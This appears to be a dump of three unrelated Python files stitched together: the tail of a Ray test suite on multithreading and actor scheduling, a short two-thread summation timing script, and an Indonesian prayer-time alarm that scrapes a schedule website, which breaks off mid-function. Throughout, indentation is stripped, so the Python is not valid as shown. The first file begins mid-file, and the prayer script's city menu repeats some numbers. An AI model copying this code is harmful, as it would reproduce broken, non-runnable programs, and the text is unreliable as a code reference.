"""A helper function that runs test cases in multiple threads."""
def wrapper():
for _ in range(num_repeats):
test_case()
time.sleep(random.randint(0, 10) / 1000.0)
return "ok"
executor = ThreadPoolExecutor(max_workers=num_threads)
futures = [executor.submit(wrapper) for _ in range(num_threads)]
for future in futures:
assert future.result() == "ok"
@ray.remote
def echo(value, delay_ms=0):
if delay_ms > 0:
time.sleep(delay_ms / 1000.0)
return value
def test_api_in_multi_threads():
"""Test using Ray api in multiple threads."""
@ray.remote
class Echo:
def echo(self, value):
return value
# Test calling remote functions in multiple threads.
def test_remote_call():
value = random.randint(0, 1000000)
result = ray.get(echo.remote(value))
assert value == result
run_test_in_multi_threads(test_remote_call)
# Test multiple threads calling one actor.
actor = Echo.remote()
def test_call_actor():
value = random.randint(0, 1000000)
result = ray.get(actor.echo.remote(value))
assert value == result
run_test_in_multi_threads(test_call_actor)
# Test put and get.
def test_put_and_get():
value = random.randint(0, 1000000)
result = ray.get(ray.put(value))
assert value == result
run_test_in_multi_threads(test_put_and_get)
# Test multiple threads waiting for objects.
num_wait_objects = 10
objects = [
echo.remote(i, delay_ms=10) for i in range(num_wait_objects)
]
def test_wait():
ready, _ = ray.wait(
objects,
num_returns=len(objects),
timeout=1000.0,
)
assert len(ready) == num_wait_objects
assert ray.get(ready) == list(range(num_wait_objects))
run_test_in_multi_threads(test_wait, num_repeats=1)
# Run tests in a driver.
test_api_in_multi_threads()
# Run tests in a worker.
@ray.remote
def run_tests_in_worker():
test_api_in_multi_threads()
return "ok"
assert ray.get(run_tests_in_worker.remote()) == "ok"
# Test actor that runs background threads.
@ray.remote
class MultithreadedActor:
def __init__(self):
self.lock = threading.Lock()
self.thread_results = []
def background_thread(self, wait_objects):
try:
# Test wait
ready, _ = ray.wait(
wait_objects,
num_returns=len(wait_objects),
timeout=1000.0,
)
assert len(ready) == len(wait_objects)
for _ in range(20):
num = 10
# Test remote call
results = [echo.remote(i) for i in range(num)]
assert ray.get(results) == list(range(num))
# Test put and get
objects = [ray.put(i) for i in range(num)]
assert ray.get(objects) == list(range(num))
time.sleep(random.randint(0, 10) / 1000.0)
except Exception as e:
with self.lock:
self.thread_results.append(e)
else:
with self.lock:
self.thread_results.append("ok")
def spawn(self):
wait_objects = [echo.remote(i, delay_ms=10) for i in range(10)]
self.threads = [
threading.Thread(
target=self.background_thread, args=(wait_objects, ))
for _ in range(20)
]
[thread.start() for thread in self.threads]
def join(self):
[thread.join() for thread in self.threads]
assert self.thread_results == ["ok"] * len(self.threads)
return "ok"
actor = MultithreadedActor.remote()
actor.spawn.remote()
ray.get(actor.join.remote()) == "ok"
@pytest.mark.skipif(client_test_enabled(), reason="internal api")
def test_wait_makes_object_local(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=0)
cluster.add_node(num_cpus=2)
ray.init(address=cluster.address)
@ray.remote
class Foo:
def method(self):
return np.zeros(1024 * 1024)
a = Foo.remote()
# Test get makes the object local.
x_id = a.method.remote()
assert not ray.worker.global_worker.core_worker.object_exists(x_id)
ray.get(x_id)
assert ray.worker.global_worker.core_worker.object_exists(x_id)
# Test wait makes the object local.
x_id = a.method.remote()
assert not ray.worker.global_worker.core_worker.object_exists(x_id)
ok, _ = ray.wait([x_id])
assert len(ok) == 1
assert ray.worker.global_worker.core_worker.object_exists(x_id)
@pytest.mark.skipif(client_test_enabled(), reason="internal api")
def test_future_resolution_skip_plasma(ray_start_cluster):
cluster = ray_start_cluster
# Disable worker caching so worker leases are not reused; set object
# inlining size threshold and enable storing of small objects in in-memory
# object store so the borrowed ref is inlined.
cluster.add_node(
num_cpus=1,
resources={"pin_head": 1},
_system_config={
"worker_lease_timeout_milliseconds": 0,
"max_direct_call_object_size": 100 * 1024,
"put_small_object_in_memory_store": True,
},
)
cluster.add_node(num_cpus=1, resources={"pin_worker": 1})
ray.init(address=cluster.address)
@ray.remote(resources={"pin_head": 1})
def f(x):
return x + 1
@ray.remote(resources={"pin_worker": 1})
def g(x):
borrowed_ref = x[0]
f_ref = f.remote(borrowed_ref)
# borrowed_ref should be inlined on future resolution and shouldn't be
# in Plasma.
assert ray.worker.global_worker.core_worker.object_exists(
borrowed_ref, memory_store_only=True)
return ray.get(f_ref) * 2
one = ray.put(1)
g_ref = g.remote([one])
assert ray.get(g_ref) == 4
def test_task_output_inline_bytes_limit(ray_start_cluster):
cluster = ray_start_cluster
# Disable worker caching so worker leases are not reused; set object
# inlining size threshold and enable storing of small objects in in-memory
# object store so the borrowed ref is inlined.
# set task_rpc_inlined_bytes_limit which only allows inline 20 bytes.
cluster.add_node(
num_cpus=1,
resources={"pin_head": 1},
_system_config={
"worker_lease_timeout_milliseconds": 0,
"max_direct_call_object_size": 100 * 1024,
"task_rpc_inlined_bytes_limit": 20,
"put_small_object_in_memory_store": True,
},
)
cluster.add_node(num_cpus=1, resources={"pin_worker": 1})
ray.init(address=cluster.address)
@ray.remote(num_returns=5, resources={"pin_head": 1})
def f():
return list(range(5))
@ray.remote(resources={"pin_worker": 1})
def sum():
numbers = f.remote()
result = 0
for i, ref in enumerate(numbers):
result += ray.get(ref)
inlined = ray.worker.global_worker.core_worker.object_exists(
ref, memory_store_only=True)
if i < 2:
assert inlined
else:
assert not inlined
return result
assert ray.get(sum.remote()) == 10
def test_task_arguments_inline_bytes_limit(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(
num_cpus=1,
resources={"pin_head": 1},
_system_config={
"max_direct_call_object_size": 100 * 1024,
# if task_rpc_inlined_bytes_limit is greater than
# max_grpc_message_size, this test fails.
"task_rpc_inlined_bytes_limit": 18 * 1024,
"max_grpc_message_size": 20 * 1024,
"put_small_object_in_memory_store": True,
},
)
cluster.add_node(num_cpus=1, resources={"pin_worker": 1})
ray.init(address=cluster.address)
@ray.remote(resources={"pin_worker": 1})
def foo(ref1, ref2, ref3):
return ref1 == ref2 + ref3
@ray.remote(resources={"pin_head": 1})
def bar():
# if the refs are inlined, the test fails.
# refs = [ray.put(np.random.rand(1024) for _ in range(3))]
# return ray.get(
# foo.remote(refs[0], refs[1], refs[2]))
return ray.get(
foo.remote(
np.random.rand(1024), # 8k
np.random.rand(1024), # 8k
np.random.rand(1024))) # 8k
ray.get(bar.remote())
# This case tests whether gcs-based actor scheduler distributes actors
# in a balanced way. By default, it uses the `SPREAD` strategy of
# gcs resource scheduler.
@pytest.mark.parametrize("args", [[5, 20], [5, 3]])
def test_actor_distribution_balance(ray_start_cluster, args):
cluster = ray_start_cluster
node_count = args[0]
actor_count = args[1]
for i in range(node_count):
cluster.add_node(
memory=1024**3,
_system_config={"gcs_actor_scheduling_enabled": True}
if i == 0 else {})
ray.init(address=cluster.address)
cluster.wait_for_nodes()
@ray.remote(memory=100 * 1024**2, num_cpus=0.01)
class Foo:
def method(self):
return ray.worker.global_worker.node.unique_id
actor_distribution = {}
actor_list = [Foo.remote() for _ in range(actor_count)]
for actor in actor_list:
node_id = ray.get(actor.method.remote())
if node_id not in actor_distribution.keys():
actor_distribution[node_id] = []
actor_distribution[node_id].append(actor)
if node_count >= actor_count:
assert len(actor_distribution) == actor_count
for node_id, actors in actor_distribution.items():
assert len(actors) == 1
else:
assert len(actor_distribution) == node_count
for node_id, actors in actor_distribution.items():
assert len(actors) <= int(actor_count / node_count)
# This case tests whether gcs-based actor scheduler works properly with
# a normal task co-existed.
def test_schedule_actor_and_normal_task(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(
memory=1024**3, _system_config={"gcs_actor_scheduling_enabled": True})
ray.init(address=cluster.address)
cluster.wait_for_nodes()
@ray.remote(memory=600 * 1024**2, num_cpus=0.01)
class Foo:
def method(self):
return 2
@ray.remote(memory=600 * 1024**2, num_cpus=0.01)
def fun(singal1, signal_actor2):
signal_actor2.send.remote()
ray.get(singal1.wait.remote())
return 1
singal1 = SignalActor.remote()
signal2 = SignalActor.remote()
o1 = fun.remote(singal1, signal2)
# Make sure the normal task is executing.
ray.get(signal2.wait.remote())
# The normal task is blocked now.
# Try to create actor and make sure this actor is not created for the time
# being.
foo = Foo.remote()
o2 = foo.method.remote()
ready_list, remaining_list = ray.wait([o2], timeout=2)
assert len(ready_list) == 0 and len(remaining_list) == 1
# Send a signal to unblock the normal task execution.
ray.get(singal1.send.remote())
# Check the result of normal task.
assert ray.get(o1) == 1
# Make sure the actor is created.
assert ray.get(o2) == 2
# This case tests whether gcs-based actor scheduler works properly
# in a large scale.
def test_schedule_many_actors_and_normal_tasks(ray_start_cluster):
cluster = ray_start_cluster
node_count = 10
actor_count = 50
each_actor_task_count = 50
normal_task_count = 1000
node_memory = 2 * 1024**3
for i in range(node_count):
cluster.add_node(
memory=node_memory,
_system_config={"gcs_actor_scheduling_enabled": True}
if i == 0 else {})
ray.init(address=cluster.address)
cluster.wait_for_nodes()
@ray.remote(memory=100 * 1024**2, num_cpus=0.01)
class Foo:
def method(self):
return 2
@ray.remote(memory=100 * 1024**2, num_cpus=0.01)
def fun():
return 1
normal_task_object_list = [fun.remote() for _ in range(normal_task_count)]
actor_list = [Foo.remote() for _ in range(actor_count)]
actor_object_list = [
actor.method.remote() for _ in range(each_actor_task_count)
for actor in actor_list
]
for object in ray.get(actor_object_list):
assert object == 2
for object in ray.get(normal_task_object_list):
assert object == 1
# This case tests whether RequestWorkerLeaseReply carries normal task resources
# when the request is rejected (due to resource preemption by normal tasks).
@pytest.mark.skip(
reason="The period of pull based resource report (10ms) is hard-coded.")
def test_worker_lease_reply_with_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(
memory=2000 * 1024**2,
_system_config={
"raylet_report_resources_period_milliseconds": 1000000,
"gcs_actor_scheduling_enabled": True,
})
node2 = cluster.add_node(memory=1000 * 1024**2)
ray.init(address=cluster.address)
cluster.wait_for_nodes()
@ray.remote(memory=1500 * 1024**2)
def fun(signal):
signal.send.remote()
time.sleep(30)
return 0
signal = SignalActor.remote()
fun.remote(signal)
# Make sure that the `fun` is running.
ray.get(signal.wait.remote())
@ray.remote(memory=800 * 1024**2)
class Foo:
def method(self):
return ray.worker.global_worker.node.unique_id
foo1 = Foo.remote()
o1 = foo1.method.remote()
ready_list, remaining_list = ray.wait([o1], timeout=10)
# If RequestWorkerLeaseReply carries normal task resources,
# GCS will then schedule foo1 to node2. Otherwise,
# GCS would keep trying to schedule foo1 to
# node1 and getting rejected.
assert len(ready_list) == 1 and len(remaining_list) == 0
assert ray.get(o1) == node2.unique_id
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
|
mtadd.py
|
import time
import threading
def add():
result = 0
for i in range(1, 50000001):
result += i
print(result)
if __name__ == '__main__':
start = time.time()
tlist = []
for i in range(2):
t = threading.Thread(target=add)
tlist.append(t) # 将线程加入到列表
t.start()
for t in tlist:
t.join() # 与waitpid类似,等待工作线程结束之后才会继续向下执行
end = time.time()
print(end - start)
|
sholat.py
|
# sholat
# karjok pangesty
# created 31, januari 2019 2:18 pm
# updated 5 mei 2019 6:00 pm
#-*-coding : utf-8-*-
'''
PLEASE READ FIRST !!!
-----------------------
The code is open source. you can use it to study.
but I really don't want to copy this script but don't include the source of the script (here the case is my repo)
so please respect people's work, however bad it may be.
'Oh my God, the program "just big open source is not segregated, until notice everything"
Who says it ??
author program "big also give notice in each readme or documentation, you wrote the DOC.
yes,
I realized my writing was very messy,
not neat, careless origin, because it is still learning.
but believe me.
This is the result of my efforts.
I made this twice.
made it first, but instead there was a problem, it disappeared. and even then finished 3 days & night to finish.
I sincerely and i made again
the time is almost the same, but this is a little faster because I already know the flow of the code.
so making the program is not easy.
respect, even if it's just writing
'thanks to: blablabla'
I'm sure those who are already pro, definitely consider this rubbish.
it's okay.
I also believe that if you are already a pro it is not possible to copy "this program".
but you guys are still learning, I'm not sure.
I hope it's useful.
'''
import sys,os, random
import subprocess as sp
import requests
from time import sleep
from time import strftime as tm
from requests import get
from bs4 import BeautifulSoup as bs
from threading import Thread
##############
# color
lgr='\033[1;95m'
lr= '\033[1;91m'
lg= '\033[1;92m'
lw= '\033[1;97m'
x = '\033[0m'
#ngambil jadwal hari ini
def gettime():
print(lg+'Updating schedule ...')
try:
ts = open('.cookie/ts','r').read()
except IOError:
gettown()
ts= open('.cookie/ts','r').read()
if len(ts) == 0:
ts = '83'
try:
r = get('https://www.jadwalsholat.org/adzan/monthly.php?id='+ts)
except requests.exceptions.ConnectionError:
print(lg+'\nAstaghfirullah..\nUkhty lupa ngidupin jaringannya'+x)
input(lg+'\nEnterin aja')
menu()
b = bs(r.text,'html.parser')
tr= b.find('tr',class_="table_highlight")
with open('.cookie/sc','w') as sc:
kota = b.find('option', attrs={'value':ts})
i= tr.find_all('td')
sc.write(i[0].text+','+i[1].text+','+i[2].text+','+i[5].text+','+i[6].text+','+i[7].text+','+i[8].text+','+kota.text)
sc.close()
def gettown():
print(
lg+"""1. """+lw+"""Ambarawa """+lg+"""78. """+lw+"""Gombong """+lg+"""155. """+lw+"""Mentok """+lg+"""232. """+lw+"""Selong"""+
lg+"""\n2. """+lw+"""Ambon """+lg+"""79. """+lw+"""Gorontalo """+lg+"""163. """+lw+"""Merauke """+lg+"""233. """+lw+"""Semarang"""+
lg+"""\n3. """+lw+"""Amlapura """+lg+"""80. """+lw+"""Gresik """+lg+"""157. """+lw+"""Metro """+lg+"""234. """+lw+"""Sengkang"""+
lg+"""\n4. """+lw+"""Amuntai """+lg+"""81. """+lw+"""Gunung Sit """+lg+"""158. """+lw+"""Meulaboh """+lg+"""235. """+lw+"""Serang"""+
lg+"""\n5. """+lw+"""Argamakmur """+lg+"""82. """+lw+"""Indramayu """+lg+"""159. """+lw+"""Mojokerto """+lg+"""236. """+lw+"""Serui"""+
lg+"""\n6. """+lw+"""Atambua """+lg+"""83. """+lw+"""Jakarta """+lg+"""160. """+lw+"""Muara Buli """+lg+"""237. """+lw+"""Sibolga"""+
lg+"""\n7. """+lw+"""Babo """+lg+"""84. """+lw+"""Jambi """+lg+"""161. """+lw+"""Muara Bung """+lg+"""238. """+lw+"""Sidikalang"""+
lg+"""\n8. """+lw+"""Bagan Siap """+lg+"""85. """+lw+"""Jayapura """+lg+"""162. """+lw+"""Muara Enim """+lg+"""239. """+lw+"""Sidoarjo"""+
lg+"""\n9. """+lw+"""Bajawa """+lg+"""86. """+lw+"""Jember """+lg+"""163. """+lw+"""Muara Tewe """+lg+"""240. """+lw+"""Sigli"""+
lg+"""\n10. """+lw+"""Balige """+lg+"""87. """+lw+"""Jeneponto """+lg+"""164. """+lw+"""Muaro Siju """+lg+"""241. """+lw+"""Singaparna"""+
lg+"""\n11. """+lw+"""Balik Papa """+lg+"""88. """+lw+"""Jepara """+lg+"""165. """+lw+"""Muntilan """+lg+"""242. """+lw+"""Singaraja"""+
lg+"""\n12. """+lw+"""Banda Aceh """+lg+"""89. """+lw+"""Jombang """+lg+"""166. """+lw+"""Nabire """+lg+"""243. """+lw+"""Singkawang"""+
lg+"""\n13. """+lw+"""Bandarlamp """+lg+"""90. """+lw+"""Kabanjahe """+lg+"""167. """+lw+"""Negara """+lg+"""244. """+lw+"""Sinjai"""+
lg+"""\n14. """+lw+"""Bandung """+lg+"""91. """+lw+"""Kalabahi """+lg+"""168. """+lw+"""Nganjuk """+lg+"""245. """+lw+"""Sintang"""+
lg+"""\n15. """+lw+"""Bangkalan """+lg+"""92. """+lw+"""Kalianda """+lg+"""169. """+lw+"""Ngawi """+lg+"""246. """+lw+"""Situbondo"""+
lg+"""\n16. """+lw+"""Bangkinang """+lg+"""93. """+lw+"""Kandangan """+lg+"""170. """+lw+"""Nunukan """+lg+"""247. """+lw+"""Slawi"""+
lg+"""\n17. """+lw+"""Bangko """+lg+"""94. """+lw+"""Karanganya """+lg+"""171. """+lw+"""Pacitan """+lg+"""248. """+lw+"""Sleman"""+
lg+"""\n18. """+lw+"""Bangli """+lg+"""95. """+lw+"""Karawang """+lg+"""172. """+lw+"""Padang """+lg+"""249. """+lw+"""Soasiu"""+
lg+"""\n19. """+lw+"""Banjar """+lg+"""96. """+lw+"""Kasungan """+lg+"""173. """+lw+"""Padang Pan """+lg+"""250. """+lw+"""Soe"""+
lg+"""\n20. """+lw+"""Banjar Bar """+lg+"""97. """+lw+"""Kayuagung """+lg+"""174. """+lw+"""Padang Sid """+lg+"""251. """+lw+"""Solo"""+
lg+"""\n21. """+lw+"""Banjarmasi """+lg+"""98 . """+lw+"""Kebumen """+lg+"""175. """+lw+"""Pagaralam """+lg+"""252. """+lw+"""Solok"""+
lg+"""\n22. """+lw+"""Banjarnega """+lg+"""99. """+lw+"""Kediri """+lg+"""176. """+lw+"""Painan """+lg+"""253. """+lw+"""Soreang"""+
lg+"""\n23. """+lw+"""Bantaeng """+lg+"""100. """+lw+"""Kefamenanu """+lg+"""177. """+lw+"""Palangkara """+lg+"""254. """+lw+"""Sorong"""+
lg+"""\n24. """+lw+"""Banten """+lg+"""101. """+lw+"""Kendal """+lg+"""178. """+lw+"""Palembang """+lg+"""255. """+lw+"""Sragen"""+
lg+"""\n25. """+lw+"""Bantul """+lg+"""102. """+lw+"""Kendari """+lg+"""179. """+lw+"""Palopo """+lg+"""263. """+lw+"""Stabat"""+
lg+"""\n26. """+lw+"""Banyuwangi """+lg+"""103. """+lw+"""Kertosono """+lg+"""180. """+lw+"""Palu """+lg+"""257. """+lw+"""Subang"""+
lg+"""\n27. """+lw+"""Barabai """+lg+"""104. """+lw+"""Ketapang """+lg+"""181. """+lw+"""Pamekasan """+lg+"""258. """+lw+"""Sukabumi"""+
lg+"""\n28. """+lw+"""Barito """+lg+"""105. """+lw+"""Kisaran """+lg+"""182. """+lw+"""Pandeglang """+lg+"""259. """+lw+"""Sukoharjo"""+
lg+"""\n29. """+lw+"""Barru """+lg+"""106. """+lw+"""Klaten """+lg+"""183. """+lw+"""Pangkajene """+lg+"""260. """+lw+"""Sumbawa Be"""+
lg+"""\n30. """+lw+"""Batam """+lg+"""107. """+lw+"""Kolaka """+lg+"""184. """+lw+"""Pangkajene """+lg+"""261. """+lw+"""Sumedang"""+
lg+"""\n31. """+lw+"""Batang """+lg+"""108. """+lw+"""Kota Baru """+lg+"""185. """+lw+"""Pangkalanb """+lg+"""262. """+lw+"""Sumenep"""+
lg+"""\n32. """+lw+"""Batu """+lg+"""109. """+lw+"""Kota Bumi """+lg+"""186. """+lw+"""Pangkalpin """+lg+"""263. """+lw+"""Sungai Lia"""+
lg+"""\n33. """+lw+"""Baturaja """+lg+"""110. """+lw+"""Kota Janth """+lg+"""187. """+lw+"""Panyabunga """+lg+"""264. """+lw+"""Sungai Pen"""+
lg+"""\n34. """+lw+"""Batusangka """+lg+"""111. """+lw+"""Kota Mobag """+lg+"""188. """+lw+"""Pare """+lg+"""265. """+lw+"""Sunggumina"""+
lg+"""\n35. """+lw+"""Baubau """+lg+"""112. """+lw+"""Kuala Kapu """+lg+"""189. """+lw+"""Parepare """+lg+"""266. """+lw+"""Surabaya"""+
lg+"""\n36. """+lw+"""Bekasi """+lg+"""113. """+lw+"""Kuala Kuru """+lg+"""190. """+lw+"""Pariaman """+lg+"""267. """+lw+"""Surakarta"""+
lg+"""\n37. """+lw+"""Bengkalis """+lg+"""114. """+lw+"""Kuala Pemb """+lg+"""191. """+lw+"""Pasuruan """+lg+"""268. """+lw+"""Tabanan"""+
lg+"""\n38. """+lw+"""Bengkulu """+lg+"""115. """+lw+"""Kuala Tung """+lg+"""192. """+lw+"""Pati """+lg+"""269. """+lw+"""Tahuna"""+
lg+"""\n39. """+lw+"""Benteng """+lg+"""116. """+lw+"""Kudus """+lg+"""193. """+lw+"""Payakumbuh """+lg+"""270. """+lw+"""Takalar"""+
lg+"""\n40. """+lw+"""Biak """+lg+"""117. """+lw+"""Kuningan """+lg+"""194. """+lw+"""Pekalongan """+lg+"""271. """+lw+"""Takengon"""+
lg+"""\n41. """+lw+"""Bima """+lg+"""118. """+lw+"""Kupang """+lg+"""195. """+lw+"""Pekan Baru """+lg+"""272. """+lw+"""Tamiang La"""+
lg+"""\n42. """+lw+"""Binjai """+lg+"""119. """+lw+"""Kutacane """+lg+"""196. """+lw+"""Pemalang """+lg+"""273. """+lw+"""Tanah Grog"""+
lg+"""\n43. """+lw+"""Bireuen """+lg+"""120. """+lw+"""Kutoarjo """+lg+"""197. """+lw+"""Pematangsi """+lg+"""274. """+lw+"""Tangerang"""+
lg+"""\n44. """+lw+"""Bitung """+lg+"""121. """+lw+"""Labuhan """+lg+"""198. """+lw+"""Pendopo """+lg+"""275. """+lw+"""Tanjung Ba"""+
lg+"""\n45. """+lw+"""Blitar """+lg+"""122. """+lw+"""Lahat """+lg+"""199. """+lw+"""Pinrang """+lg+"""276. """+lw+"""Tanjung En"""+
lg+"""\n46. """+lw+"""Blora """+lg+"""123. """+lw+"""Lamongan """+lg+"""200. """+lw+"""Pleihari """+lg+"""277. """+lw+"""Tanjung Pa"""+
lg+"""\n47. """+lw+"""Bogor """+lg+"""124. """+lw+"""Langsa """+lg+"""201. """+lw+"""Polewali """+lg+"""278. """+lw+"""Tanjung Pi"""+
lg+"""\n48. """+lw+"""Bojonegoro """+lg+"""125. """+lw+"""Larantuka """+lg+"""202. """+lw+"""Pondok Ged """+lg+"""279. """+lw+"""Tanjung Re"""+
lg+"""\n49. """+lw+"""Bondowoso """+lg+"""126. """+lw+"""Lawang """+lg+"""203. """+lw+"""Ponorogo """+lg+"""280. """+lw+"""Tanjung Se"""+
lg+"""\n50. """+lw+"""Bontang """+lg+"""127. """+lw+"""Lhoseumawe """+lg+"""204. """+lw+"""Pontianak """+lg+"""281. """+lw+"""Tapak Tuan"""+
lg+"""\n51. """+lw+"""Boyolali """+lg+"""128. """+lw+"""Limboto """+lg+"""205. """+lw+"""Poso """+lg+"""282. """+lw+"""Tarakan"""+
lg+"""\n52. """+lw+"""Brebes """+lg+"""129. """+lw+"""Lubuk Basu """+lg+"""206. """+lw+"""Prabumulih """+lg+"""283. """+lw+"""Tarutung"""+
lg+"""\n53. """+lw+"""Bukit Ting """+lg+"""130. """+lw+"""Lubuk Ling """+lg+"""207. """+lw+"""Praya """+lg+"""284. """+lw+"""Tasikmalay"""+
lg+"""\n54. """+lw+"""Bulukumba """+lg+"""131. """+lw+"""Lubuk Paka """+lg+"""208. """+lw+"""Probolingg """+lg+"""285. """+lw+"""Tebing Tin"""+
lg+"""\n55. """+lw+"""Buntok """+lg+"""132. """+lw+"""Lubuk Sika """+lg+"""209. """+lw+"""Purbalingg """+lg+"""286. """+lw+"""Tegal"""+
lg+"""\n63. """+lw+"""Cepu """+lg+"""133. """+lw+"""Lumajang """+lg+"""210. """+lw+"""Purukcahu """+lg+"""287. """+lw+"""Temanggung"""+
lg+"""\n57. """+lw+"""Ciamis """+lg+"""134. """+lw+"""Luwuk """+lg+"""211. """+lw+"""Purwakarta """+lg+"""288. """+lw+"""Tembilahan"""+
lg+"""\n58. """+lw+"""Cianjur """+lg+"""135. """+lw+"""Madiun """+lg+"""212. """+lw+"""Purwodadig """+lg+"""289. """+lw+"""Tenggarong"""+
lg+"""\n59. """+lw+"""Cibinong """+lg+"""136. """+lw+"""Magelang """+lg+"""213. """+lw+"""Purwokerto """+lg+"""290. """+lw+"""Ternate"""+
lg+"""\n60. """+lw+"""Cilacap """+lg+"""137. """+lw+"""Magetan """+lg+"""214. """+lw+"""Purworejo """+lg+"""291. """+lw+"""Tolitoli"""+
lg+"""\n61. """+lw+"""Cilegon """+lg+"""138. """+lw+"""Majalengka """+lg+"""215. """+lw+"""Putussibau """+lg+"""292. """+lw+"""Tondano"""+
lg+"""\n62. """+lw+"""Cimahi """+lg+"""139. """+lw+"""Majene """+lg+"""216. """+lw+"""Raha """+lg+"""293. """+lw+"""Trenggalek"""+
lg+"""\n63. """+lw+"""Cirebon """+lg+"""140. """+lw+"""Makale """+lg+"""217. """+lw+"""Rangkasbit """+lg+"""294. """+lw+"""Tual"""+
lg+"""\n64. """+lw+"""Curup """+lg+"""141. """+lw+"""Makassar """+lg+"""218. """+lw+"""Rantau """+lg+"""295. """+lw+"""Tuban"""+
lg+"""\n65. """+lw+"""Demak """+lg+"""142. """+lw+"""Malang """+lg+"""219. """+lw+"""Rantauprap """+lg+"""296. """+lw+"""Tulung Agu"""+
lg+"""\n66. """+lw+"""Denpasar """+lg+"""143. """+lw+"""Mamuju """+lg+"""220. """+lw+"""Rantepao """+lg+"""297. """+lw+"""Ujung Beru"""+
lg+"""\n67. """+lw+"""Depok """+lg+"""144. """+lw+"""Manna """+lg+"""221. """+lw+"""Rembang """+lg+"""298. """+lw+"""Ungaran"""+
lg+"""\n68. """+lw+"""Dili """+lg+"""145. """+lw+"""Manokwari """+lg+"""222. """+lw+"""Rengat """+lg+"""299. """+lw+"""Waikabubak"""+
lg+"""\n69. """+lw+"""Dompu """+lg+"""146. """+lw+"""Marabahan """+lg+"""223. """+lw+"""Ruteng """+lg+"""300. """+lw+"""Waingapu"""+
lg+"""\n70. """+lw+"""Donggala """+lg+"""147. """+lw+"""Maros """+lg+"""224. """+lw+"""Sabang """+lg+"""301. """+lw+"""Wamena"""+
lg+"""\n71. """+lw+"""Dumai """+lg+"""148. """+lw+"""Martapura """+lg+"""225. """+lw+"""Salatiga """+lg+"""302. """+lw+"""Watampone"""+
lg+"""\n72. """+lw+"""Ende """+lg+"""149. """+lw+"""Masohi """+lg+"""226. """+lw+"""Samarinda """+lg+"""303. """+lw+"""Watansoppe"""+
lg+"""\n73. """+lw+"""Enggano """+lg+"""150. """+lw+"""Mataram """+lg+"""227. """+lw+"""Sampang """+lg+"""304. """+lw+"""Wates"""+
lg+"""\n74. """+lw+"""Enrekang """+lg+"""151. """+lw+"""Maumere """+lg+"""228. """+lw+"""Sampit """+lg+"""305. """+lw+"""Wonogiri"""+
lg+"""\n75. """+lw+"""Fakfak """+lg+"""152. """+lw+"""Medan """+lg+"""229. """+lw+"""Sanggau """+lg+"""306. """+lw+"""Wonosari"""+
lg+"""\n76. """+lw+"""Garut """+lg+"""153. """+lw+"""Mempawah """+lg+"""230. """+lw+"""Sawahlunto """+lg+"""307. """+lw+"""Wonosobo"""+
lg+"""\n77. """+lw+"""Gianyar """+lg+"""154. """+lw+"""Menado """+lg+"""231. """+lw+"""Sekayu """+lg+"""308. """+lw+"""Yogyakarta""")
print(lg+'_'*63)
inp = input(lg+'Select your city::'+x)
if int(inp) <= 82:
pass
elif int(inp) > 83 and int(inp) <= 204:
inp = str(int(inp)-1)
elif int(inp) >= 205:
inp = str(int(inp)-1)
else:
inp = '308'
ts = open('.cookie/ts','w')
ts.write(inp)
ts.close()
gettime()
# input
def start():
global s,d,a,m,i,tt,o,im,saur
try:
banner()
try:
o = open('.cookie/sc','r').read()
except IOError:
gettime()
o = open('.cookie/sc','r').read()
o = o.split(',')
if o[0] != tm('%d'):
gettime()
im= int(o[1].replace(':',''))
s = int(o[2].replace(':',''))
d = int(o[3].replace(':',''))
a = int(o[4].replace(':',''))
m = int(o[5].replace(':',''))
i = int(o[6].replace(':',''))
tt = int(tm('%H%M'))
saur = im - 100
if tt > s and tt < d:
ss = 'sholat Dzuhur'
elif tt > d and tt < a:
ss = 'sholat Ashar'
elif tt > a and tt < m:
ss = 'sholat Maghrib'
elif tt > m and tt < i:
ss = 'sholat Isya'
elif tt > i and im < s or tt < 2400 and im < s and tt < im:
ss = 'Imsak'
else:
ss = 'sholat Subuh'
banner()
print(f'''
{lg}Prayer times {lw}{tm('%d %B, %Y')}
{lg}For the City{lw} {o[7]}{lg} and surroundings.
{lg}Imsak : {lw}{o[1]}
{lg}Subuh : {lw}{o[2]}
{lg}Dzuhur : {lw}{o[3]}
{lg}Ashar : {lw}{o[4]}
{lg}Maghrib : {lw}{o[5]}
{lg}Isya : {lw}{o[6]}
{lg}Sedang menantikan waktu {ss}..
ctrl + c untuk berhenti''')
while True:
tt = int(tm('%H%M'))
time = tm(f'{lw}%H{lg}:{lw}%M{lg}:{lw}%S{lg}')
if tt == s:
banner()
print (lw+f' {lg}SAATNYA ADZAN SUBUH{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya')
print (lg+'_'*63)
trdsholat()
start()
break
elif tt == d:
banner()
print (lw+f' {lg}SAATNYA ADZAN DZUHUR{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya')
print (lg+'_'*63)
trdsholat()
start()
break
elif tt == a:
banner()
print (lw+f' {lg}SAATNYA ADZAN ASHAR{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya')
print (lg+'_'*63)
trdsholat()
start()
break
elif tt == m:
banner()
print (lw+f' {lg}SAATNYA ADZAN MAGHRIB{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya')
print (lg+'_'*63)
trdsholat()
start()
break
elif tt == i:
banner()
print (lw+f' {lg}SAATNYA ADZAN ISYA{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya')
print (lg+'_'*63)
trdsholat()
start()
break
elif tt == im:
banner()
print (lw+f' {lg}WAKTU IMSAK{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya')
print (lg+'_'*63)
trdpuasa()
start()
break
elif tt == saur:
banner()
print (lw+f' {lg}WAKTUNYA BANGUN SAHUR GAN !!!{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya\n\n{lg}Credit:{x} https://youtu.be/EXjt18hF6UY')
print (lg+'_'*63)
trdpuasa()
start()
break
else:
print ('\rSekarang jam {} '.format(time),end=''),;sys.stdout.flush();sleep(1)
except KeyboardInterrupt:
menu()
def ani():
print('\n')
for i in random.choice(txt):
print(lg+str(i.replace('\n','')),end=''),;sys.stdout.flush();sleep(0.05)
sleep(2)
def suara():
if tm('%H:%M') == o[2]:
nada = '.fajr'
elif tm('%H:%M') == o[1]:
nada = '.ims'
elif int(tm('%H%M')) == saur:
